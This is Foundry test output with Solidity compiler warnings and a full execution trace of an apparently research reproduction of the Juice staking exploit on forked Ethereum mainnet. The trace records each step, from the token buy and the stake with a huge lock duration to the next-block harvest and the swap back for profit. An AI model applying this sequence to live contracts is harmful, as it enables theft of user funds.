Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.15s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/Juice_exp.sol:26:5:
   |
26 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-03/Juice_exp.sol:23:1:
   |
23 | contract Juice is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-03/Juice_exp.sol:74:5:
   |
74 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 812.18ms (2.66ms CPU time)

Ran 1 test for src/test/2024-03/Juice_exp.sol:Juice
[PASS] testExploit() (gas: 469773)
Logs:
  [Start] Attacker ETH balance before exploit: 79228162514.264337593543950335
  [End] Attacker ETH Balance After exploit: 79228162544.350808320756466659

Traces:
  [5623] Juice::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19395636 [1.939e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [554973] Juice::testExploit()
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker ETH balance before exploit", val: 79228162514264337593543950335 [7.922e28], decimals: 18)
    ├─ [145236] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokensSupportingFeeOnTransferTokens{value: 500000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae], Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1709964383 [1.709e9])
    │   ├─ [23974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 500000000000000000}()
    │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 500000000000000000 [5e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   └─ ← [Stop]
    │   ├─ [8062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, 500000000000000000 [5e17])
    │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, value: 500000000000000000 [5e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1c38f8dcbad98944ef0e1ccfc3fda43fb5511c81b9267a9e995b6c60aa387675: 0x00000000000000000000000000000000000000000000000335ffa9e4306c4b09 → 0x0000000000000000000000000000000000000000000000033cf0053e041e4b09
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000006f05b59d3b20000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2504] 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C::getReserves() [staticcall]
    │   │   └─ ← [Return] 59231247621730093833 [5.923e19], 315102193452219849661269 [3.151e23], 1709964071 [1.709e9]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   └─ ← [Return] 59731247621730093833 [5.973e19]
    │   ├─ [85319] 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C::swap(0, 2629819305963137449683 [2.629e21], Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [52565] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::transfer(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2629819305963137449683 [2.629e21])
    │   │   │   ├─ emit Transfer(from: 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, to: 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae, value: 26298193059631374496 [2.629e19])
    │   │   │   ├─ emit Transfer(from: 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, to: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2603521112903506075187 [2.603e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000008d231d1223c3261e33
    │   │   │   │   @ 0xcfc33226d8ec9110b56a57a6b29558cb2d09f7d67e37771e7d2e80feb54fc21e: 0x0000000000000000000000000000000000000000000042b9b960e5d27dde5b55 → 0x00000000000000000000000000000000000000000000422b294de06db8bf9c82
    │   │   │   │   @ 0x077968d844089b330ab7d6e8adfc20bb4bdd9adbf9c73b47e0b8cd3abfd986a4: 0x000000000000000000000000000000000000000000000005e7deea2c57e2d0f2 → 0x00000000000000000000000000000000000000000000000754d4dd6d59db7192
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   │   └─ ← [Return] 59731247621730093833 [5.973e19]
    │   │   ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   │   └─ ← [Return] 312472374146256712211586 [3.124e23]
    │   │   ├─ emit Sync(reserve0: 59731247621730093833 [5.973e19], reserve1: 312472374146256712211586 [3.124e23])
    │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 500000000000000000 [5e17], amount1In: 0, amount0Out: 0, amount1Out: 2629819305963137449683 [2.629e21], to: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x65ebfb270000000042b9b960e5d27dde5b5500000000000335ffa9e4306c4b09 → 0x65ebfc2300000000422b294de06db8bf9c820000000000033cf0053e041e4b09
    │   │   │   @ 9: 0x00000000000000000000000000002e1b5ee5c806a7e92b2fa3a07d5eae0c8fec → 0x00000000000000000000000000002e2fd3a38efa79463506bffdf7284dc9f99c
    │   │   │   @ 10: 0x00000000000000000000000000000000002d54493890a221b9ad4c0052134400 → 0x00000000000000000000000000000000002d6069a31575f9ad478800b3e0e1b0
    │   │   └─ ← [Stop]
    │   ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 2603521112903506075187 [2.603e21]
    │   └─ ← [Stop]
    ├─ [25277] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::approve(0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x172887a4997cbf111ca99cd460b5ea15249cf090be5776b64879652ce38476ef: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2603521112903506075187 [2.603e21]
    ├─ [190810] 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e::stake(2603521112903506075187 [2.603e21], 3000000000 [3e9])
    │   ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 2603521112903506075187 [2.603e21]
    │   ├─ [25522] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::transferFrom(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, 2603521112903506075187 [2.603e21])
    │   │   ├─ emit Transfer(from: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae, value: 0)
    │   │   ├─ emit Transfer(from: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, value: 2603521112903506075187 [2.603e21])
    │   │   ├─ emit Approval(owner: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, value: 115792089237316195423570985008687907853269984665640564036854062895009623564748 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb789e4a52563cb53425f1fe09c29ded7c90d83f965db05e59d94d330417c49b7: 0x00000000000000000000000000000000000000000001162ea08823a825780000 → 0x0000000000000000000000000000000000000000000116bbc3a535cbe89e1e33
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00000000000000000000000000000000000000000000008d231d1223c3261e33 → 0
    │   │   │   @ 0x172887a4997cbf111ca99cd460b5ea15249cf090be5776b64879652ce38476ef: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffff72dce2eddc3cd9e1cc
    │   │   └─ ← [Return] true
    │   ├─ emit Stake(: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 2603521112903506075187 [2.603e21])
    │   ├─  storage changes:
    │   │   @ 5: 0x0000000000000000000000000000000000000000000000000000000065ebfbdb → 0x0000000000000000000000000000000000000000000000000000000065ebfc23
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10fc: 0 → 0x0000000000000000000000000000000000000000000000003ab318e4ba77cf71
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10f8: 0 → 0x00000000000000000000000000000000000000000000008d231d1223c3261e33
    │   │   @ 0x2d54905f2886c13936added7edccb32207862f31b1e49ad77f933216b9848722: 0 → 1
    │   │   @ 2: 0x00000000000000000000000000000000000000000000ac4d92a0bd3154f80000 → 0x00000000000000000000000000000000000000000000acdab5bdcf55181e1e33
    │   │   @ 0x172887a4997cbf111ca99cd460b5ea15249cf090be5776b64879652ce38476ef: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffff72dce2eddc3cd9e1cc
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10fb: 0 → 0x00000000000000000000000000000000000000000000000000000000b2d05e00
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10f9: 0 → 0x0000000000000000000000000000000000000000000000000000000065ebfc23
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10fa: 0 → 0x000000000000000000000000000000000000000000000000000672305166fc23
    │   │   @ 8: 0x0000000000000000000000000000000000000000000000000005c300ad9d2252 → 0x0000000000000000000000000000000000000000000000000005c5970d91b2e5
    │   └─ ← [Stop]
    ├─ [0] VM::roll(19395637 [1.939e7])
    │   └─ ← [Return]
    ├─ [0] VM::warp(1709964335 [1.709e9])
    │   └─ ← [Return]
    ├─ [41716] 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e::harvest(0)
    │   ├─ [31430] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::transfer(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 332238461642082793241880 [3.322e23])
    │   │   ├─ emit Transfer(from: 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, to: 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae, value: 0)
    │   │   ├─ emit Transfer(from: 0x8584DdbD1E28bCA4bc6Fb96baFe39f850301940e, to: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 332238461642082793241880 [3.322e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb789e4a52563cb53425f1fe09c29ded7c90d83f965db05e59d94d330417c49b7: 0x0000000000000000000000000000000000000000000116bbc3a535cbe89e1e33 → 0x00000000000000000000000000000000000000000000d06114c5e9224be2e11b
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000465aaedf4ca99cbb3d18
    │   │   └─ ← [Return] true
    │   ├─ emit Harvest(: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 332238461642082793241880 [3.322e23])
    │   ├─  storage changes:
    │   │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10fc: 0x0000000000000000000000000000000000000000000000003ab318e4ba77cf71 → 0x0000000000000000000000000000000000000000000000003ab77809d1cd4a78
    │   │   @ 5: 0x0000000000000000000000000000000000000000000000000000000065ebfc23 → 0x0000000000000000000000000000000000000000000000000000000065ebfc2f
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000465aaedf4ca99cbb3d18
    │   │   @ 8: 0x0000000000000000000000000000000000000000000000000005c5970d91b2e5 → 0x0000000000000000000000000000000000000000000000000005c60518c17e16
    │   └─ ← [Stop]
    ├─ [25277] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x911a87982733987439e36e2e722f6ea6e865fd905bdac35dc01b229c4f89cd70: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 332238461642082793241880 [3.322e23]
    ├─ [84407] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETHSupportingFeeOnTransferTokens(332238461642082793241880 [3.322e23], 0, [0xdE5d2530A877871F6f0fc240b9fCE117246DaDae, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1709964395 [1.709e9])
    │   ├─ [21505] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::transferFrom(Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, 332238461642082793241880 [3.322e23])
    │   │   ├─ emit Transfer(from: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae, value: 3322384616420827932418 [3.322e21])
    │   │   ├─ emit Transfer(from: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, value: 328916077025661965309462 [3.289e23])
    │   │   ├─ emit Approval(owner: Juice: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640563707219122365830336398055 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x911a87982733987439e36e2e722f6ea6e865fd905bdac35dc01b229c4f89cd70: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffb9a55120b3566344c2e7
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00000000000000000000000000000000000000000000465aaedf4ca99cbb3d18 → 0
    │   │   │   @ 0xcfc33226d8ec9110b56a57a6b29558cb2d09f7d67e37771e7d2e80feb54fc21e: 0x00000000000000000000000000000000000000000000422b294de06db8bf9c82 → 0x0000000000000000000000000000000000000000000087d1bcd3e7345b97b298
    │   │   │   @ 0x077968d844089b330ab7d6e8adfc20bb4bdd9adbf9c73b47e0b8cd3abfd986a4: 0x00000000000000000000000000000000000000000000000754d4dd6d59db7192 → 0x0000000000000000000000000000000000000000000000bb702e235053be9894
    │   │   └─ ← [Return] true
    │   ├─ [504] 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C::getReserves() [staticcall]
    │   │   └─ ← [Return] 59731247621730093833 [5.973e19], 312472374146256712211586 [3.124e23], 1709964323 [1.709e9]
    │   ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   └─ ← [Return] 641388451171918677521048 [6.413e23]
    │   ├─ [37516] 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C::swap(30586470727212516324 [3.058e19], 0, 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   ├─ [23162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 30586470727212516324 [3.058e19])
    │   │   │   ├─ emit Transfer(from: 0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 30586470727212516324 [3.058e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000001a878f9128462c3e4
    │   │   │   │   @ 0x1c38f8dcbad98944ef0e1ccfc3fda43fb5511c81b9267a9e995b6c60aa387675: 0x0000000000000000000000000000000000000000000000033cf0053e041e4b09 → 0x00000000000000000000000000000000000000000000000194770c2b7fbb8725
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   │   └─ ← [Return] 29144776894517577509 [2.914e19]
    │   │   ├─ [897] 0xdE5d2530A877871F6f0fc240b9fCE117246DaDae::balanceOf(0xBa8381Ed6122829DaA46B0038d980d1c6e17CD7C) [staticcall]
    │   │   │   └─ ← [Return] 641388451171918677521048 [6.413e23]
    │   │   ├─ emit Sync(reserve0: 29144776894517577509 [2.914e19], reserve1: 641388451171918677521048 [6.413e23])
    │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 328916077025661965309462 [3.289e23], amount0Out: 30586470727212516324 [3.058e19], amount1Out: 0, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x00000000000000000000000000000000002d6069a31575f9ad478800b3e0e1b0 → 0x00000000000000000000000000000000002d60fff80c9cf88f347f93e0e02c88
    │   │   │   @ 8: 0x65ebfc2300000000422b294de06db8bf9c820000000000033cf0053e041e4b09 → 0x65ebfc2f0000000087d1bcd3e7345b97b29800000000000194770c2b7fbb8725
    │   │   │   @ 9: 0x00000000000000000000000000002e2fd3a38efa79463506bffdf7284dc9f99c → 0x00000000000000000000000000002e30c8db37edaf81a692d3e392715cdf4500
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) [staticcall]
    │   │   └─ ← [Return] 30586470727212516324 [3.058e19]
    │   ├─ [9223] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(30586470727212516324 [3.058e19])
    │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 30586470727212516324}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 30586470727212516324 [3.058e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000001a878f9128462c3e4 → 0
    │   │   └─ ← [Stop]
    │   ├─ [41] Juice::fallback{value: 30586470727212516324}()
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker ETH Balance After exploit", val: 79228162544350808320756466659 [7.922e28], decimals: 18)
    ├─  storage changes:
    │   @ 0x911a87982733987439e36e2e722f6ea6e865fd905bdac35dc01b229c4f89cd70: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x172887a4997cbf111ca99cd460b5ea15249cf090be5776b64879652ce38476ef: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0xfa77619e58a1f863cf3d9dd267b543de1c6f64b8fcdc73d46169e4c6bdda10fc: 0x0000000000000000000000000000000000000000000000003ab318e4ba77cf71 → 0x0000000000000000000000000000000000000000000000003ab77809d1cd4a78
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.38s (12.02s CPU time)

Ran 2 test suites in 15.31s (14.19s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
